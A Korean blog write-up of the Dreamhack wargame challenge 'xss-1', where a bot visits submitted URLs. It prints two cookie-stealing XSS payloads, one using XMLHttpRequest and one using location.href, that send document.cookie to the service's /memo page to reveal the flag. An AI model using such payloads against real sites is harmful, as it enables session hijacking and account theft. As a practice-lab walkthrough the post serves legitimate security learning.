Dreamhack - 워게임, XSS-1

728x90

xss-1

여러 기능과 입력받은 URL을 확인하는 봇이 구현된 서비스입니다. XSS 취약점을 이용해 플래그를 획득하세요. 플래그는 flag.txt, FLAG 변수에 있습니다. Reference Client-side Basic

dreamhack.io

/flag로 진입해 아래의 스크립트를 넣어주어서 실행하였다.

<script>var xhr = new XMLHttpRequest();xhr.open('GET', '/memo?memo=' + document.cookie);xhr.send();</script>

XHR 요청으로 서버 자기 자신의 쿠키를 메모하는 스크립트이다.

/memo로 들어가 주면?

플래그 값이 나온다.

<script>location.href="http://127.0.0.1:8000/memo?memo=hello"+document.cookie;</script>

XHR 요청말고도, location.href를 이용해도 쿠키가 담긴 GET 요청을 보낼 수가 있다.

728x90

Dreamhack - 워게임, image-storage (0)	2021.11.24
Dreamhack - 워게임, file-download-1 (0)	2021.11.24
Dreamhack - 워게임, pathtraversal (0)	2021.11.21
Dreamhack - 워게임, csrf-1 (0)	2021.11.21
Dreamhack - 워게임, php-1 (0)	2021.11.21

HackLog